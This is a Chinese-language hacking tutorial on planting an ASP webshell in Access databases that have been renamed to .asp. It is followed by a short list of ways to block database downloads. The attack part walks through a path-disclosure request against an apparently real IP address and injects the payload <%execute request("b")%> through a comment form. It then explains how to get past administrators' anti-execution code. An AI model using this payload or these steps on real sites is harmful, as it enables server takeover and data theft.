一.思路
大家都知道<%%>為asp文件的標志符,也就是說一個asp文件只會去執行<%%>之間的代碼,access+asp的web系統的所有數據都是存放在數據庫文件里(mdb文件),由于管理者把mdb文件改為了asp文件,如果我們提交的數據里包含有<%%>,那當我們訪問這個asp數據庫的時候就會去執行<%%>之間的代碼。這樣導致我們只提交惡意代碼給數據庫,那么asp后綴的數據庫就是我們的webshell了。
二.示例
隨便找個目標,首先我們暴庫,看是不是asp后綴的數據庫:http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210
返回:
復制代碼代碼如下:
Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft JET Database Engine 錯誤 '80004005'
'D:/log_mdb/%29dlog_mdb%29.asp'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。
/test/conn.asp,行18
我們提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的亂碼,這樣我們可以直接用網際快車等工具直接下載數據庫(這里我們不討論)。我們回到主頁看到有提供“網友評論”功能。我們注冊個用戶,發一條評論:
<%execute request("b")%>
這樣我們就把asp代碼:<%execute request("b")%>寫入了數據庫,那么數據庫:就是我們的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在亂碼的最后我們看到:
復制代碼代碼如下:
/iisHelp/common/500-100.asp,行242
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'
類型不匹配: 'execute'
/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266
注意:我們在向數據庫提交代碼時,代碼內容不可以太大。所以我們采用<%execute request("b")%>。
三.其他一些問題和思路
1.對于改了后綴為asp,還對數據庫里加入了<%='a'-1%>等非法的asp代碼來徹底防止下載的數據庫,由于里面存在了非法的asp代碼,插入我們的webshell代碼后運行,將只會顯示前面非法代碼的錯誤,而不去執行我們shell的代碼。雖然這樣可以防止一定的攻擊,但還是存在一定的隱患,我們只要在出錯的代碼前加入兼容錯誤的代碼,就可以得到正確顯示執行我們插入的webshell代碼了。
2.對于沒有改后綴的,也就是mdb文件,這樣我們可以先直接下載下來得到后臺密碼,進了后臺,可以利用數據庫備用改后綴為asp。
mdb防下載方法小結
1:在iis6下面 如果一個擴展名沒有被定義則 訪問的時候會出現文件沒有找到的404錯誤。
因此你可以將數據庫任意命名成一個絕對不會出現的文件名就可以達到安全的效果比如:xxxxx.xxxxxxxxxxx
2 將數據庫放在網站的外部,那絕對就不能訪問得到了。例如: e:/web/是你的網站
則把數據庫放在e:/
3 正如樓上所說的 將.mdb 改成 .asp 同時倒入一個特殊的表 包含 <% 的二進制字符 這樣訪問文件出現 缺少腳本關閉符的提示。
4 或者將.mdb 改成.asp 同時用winhex打開 可以發現176以后有很長一部分 00 字符串 你隨便在處改成一段asp代碼 也可以實現防止下載,這樣也不影響數據庫功能。例如:
<%
response.write("非法訪問")
response.end()
%>
現在在數據庫的名稱里 加上 “#” 和空格 都被破解了 比如“#” = “<%35” 而空格 = “<%20”
所以說 現在用這些已經不管用了。。
如果是自己的服務器的話就在IIS里設置一下:
新建一個空白的DLL文件,然后在IIS里添加映射,可執行文件選剛才建的這個DLL,擴展名填.mdb,保存后重啟一下IIS服務即可。
